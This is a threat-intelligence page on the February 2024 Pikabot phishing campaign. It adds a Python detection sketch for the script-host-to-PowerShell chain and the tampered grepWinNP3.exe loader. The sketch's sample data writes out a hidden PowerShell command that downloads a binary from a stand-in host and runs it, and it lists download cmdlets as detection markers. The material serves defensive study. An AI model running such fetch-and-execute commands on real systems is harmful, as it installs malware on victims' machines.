C0036 Pikabot Distribution February 2024
Pikabot Distribution February 2024 delivered Pikabot through malicious emails containing links to malicious ZIP archives; the infection chain required user interaction (opening the archive and running its contents) before follow-on stages executed. The Pikabot version distributed in this campaign featured significant changes from the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]
| Item | Value |
|---|---|
| ID | C0036 |
| Associated Names | |
| First Seen | February 2024 |
| Last Seen | February 2024 |
| Version | 1.0 |
| Created | 17 July 2024 |
| Last Modified | 28 October 2024 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.[1] |
| enterprise | T1059.007 | JavaScript | Pikabot Distribution February 2024 utilized obfuscated JavaScript files for the initial Pikabot payload download.[1] |
| enterprise | T1574 | Hijack Execution Flow | Pikabot Distribution February 2024 utilized a tampered legitimate executable, grepWinNP3.exe, as its first-stage Pikabot loader, modifying the open-source tool so that it executes malicious code when launched.[1] |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.002 | Spearphishing Link | Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.[1] |
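As an added example (not part of this ATT&CK page or of any Pikabot reporting), the following Python sketch turns two of the behaviours in the table into checks: the T1059.007 to T1059.001 hand-off becomes a parent/child process rule run over process-creation events, and the T1574 tampered grepWinNP3.exe becomes a SHA-256 comparison against a baseline taken from a trusted copy of the tool. Every event, path, command line and binary byte string below is constructed for the example; the `Temp1_<name>.zip` path is the folder Explorer uses when a file is opened straight from a ZIP and is used here only as a heuristic.

```python
"""Detection sketch for the Pikabot February 2024 delivery chain (added example).

1. Execution chain (T1059.007 -> T1059.001): a script host running a .js file spawns
   PowerShell whose command line contains a download cmdlet.
2. Tampered loader (T1574): a binary named like a known tool whose hash differs from
   the baseline captured from a trusted copy.
All events, paths and bytes are constructed for this example.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass
from typing import Iterable

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}        # hosts that run the obfuscated .js dropper
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
# Fragments that suggest PowerShell is fetching a payload rather than doing local admin work.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile(", "downloadstring(",
                    "start-bitstransfer", "curl ", "wget ")
# ".js" followed by end of string, whitespace or a quote (avoids matching ".json" etc.).
JS_ARG = re.compile(r"\.js(?=$|[\s\"'])")


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (fields a Sysmon Event ID 1 or EDR event carries)."""
    parent_image: str
    parent_command_line: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def find_script_to_powershell(events: Iterable[ProcEvent]) -> list[dict]:
    """Flag PowerShell spawned by wscript/cscript; raise severity when the parent ran a .js
    file and the child command line shows download activity."""
    alerts = []
    for ev in events:
        if _basename(ev.parent_image) not in SCRIPT_HOSTS:
            continue
        if _basename(ev.image) not in POWERSHELL_HOSTS:
            continue
        parent_cl = ev.parent_command_line.lower()
        child_cl = ev.command_line.lower()
        js_parent = JS_ARG.search(parent_cl) is not None
        downloads = any(m in child_cl for m in DOWNLOAD_MARKERS)
        from_archive = ".zip\\" in parent_cl   # file launched directly out of a ZIP (heuristic)
        alerts.append({
            "parent": _basename(ev.parent_image),
            "js_parent": js_parent,
            "download": downloads,
            "from_archive": from_archive,
            "severity": "high" if (js_parent and downloads) else "medium",
        })
    return alerts


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_loader_integrity(name: str, data: bytes, baseline: dict[str, str]) -> str:
    """Compare a binary's SHA-256 with the baseline for its file name: 'ok', 'tampered' or 'unknown'."""
    expected = baseline.get(name.lower())
    if expected is None:
        return "unknown"
    return "ok" if sha256_hex(data) == expected else "tampered"


# Constructed stand-ins: a "trusted" grepWinNP3.exe image and the same bytes with a stub spliced in.
PRISTINE_GREPWIN = b"MZ\x90\x00" + b"grepWinNP3 trusted build (constructed) " * 4
TAMPERED_GREPWIN = PRISTINE_GREPWIN[:8] + b"\xe8\x00\x00\x00\x00" + PRISTINE_GREPWIN[8:]
BASELINE = {"grepwinnp3.exe": sha256_hex(PRISTINE_GREPWIN)}   # captured from the trusted copy

JS_PATH = r"C:\Users\alice\AppData\Local\Temp\Temp1_Invoice.zip\Invoice_2024-02.js"
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation events
    # Benign: an admin launches PowerShell from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe", "explorer.exe", PS_IMAGE, "powershell.exe Get-Service"),
    # Dropper chain: wscript runs the .js from the ZIP, which hands off to PowerShell to fetch the loader.
    ProcEvent(r"C:\Windows\System32\wscript.exe", f'wscript.exe "{JS_PATH}"', PS_IMAGE,
              'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/g.bin '
              r'-OutFile $env:TEMP\grepWinNP3.exe; Start-Process $env:TEMP\grepWinNP3.exe"'),
    # Script host spawning PowerShell with no download activity: still a medium alert.
    ProcEvent(r"C:\Windows\System32\cscript.exe", r"cscript.exe C:\scripts\inventory.vbs",
              PS_IMAGE, "powershell.exe Get-Date"),
]

if __name__ == "__main__":
    for alert in find_script_to_powershell(SAMPLE_EVENTS):
        print(alert)
    for label, blob in (("trusted copy", PRISTINE_GREPWIN), ("dropped copy", TAMPERED_GREPWIN)):
        print(label, check_loader_integrity("grepWinNP3.exe", blob, BASELINE))
```

The script-host-to-PowerShell rule will also fire on legitimate logon or inventory scripts, which is why the download marker (not the parent/child pair alone) is what raises severity. For the loader check, the baseline hash should come from a trusted download of the tool rather than from a host where the file was already dropped; where a vendor signs its releases, an Authenticode signature check is the stronger test, since any byte-level modification of the kind described for grepWinNP3.exe invalidates the signature as well as the hash.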
Software
| ID | Name | Description |
|---|---|---|
| S1145 | Pikabot | Pikabot Distribution February 2024 distributed Pikabot for initial access purposes in February 2024.[1][2] |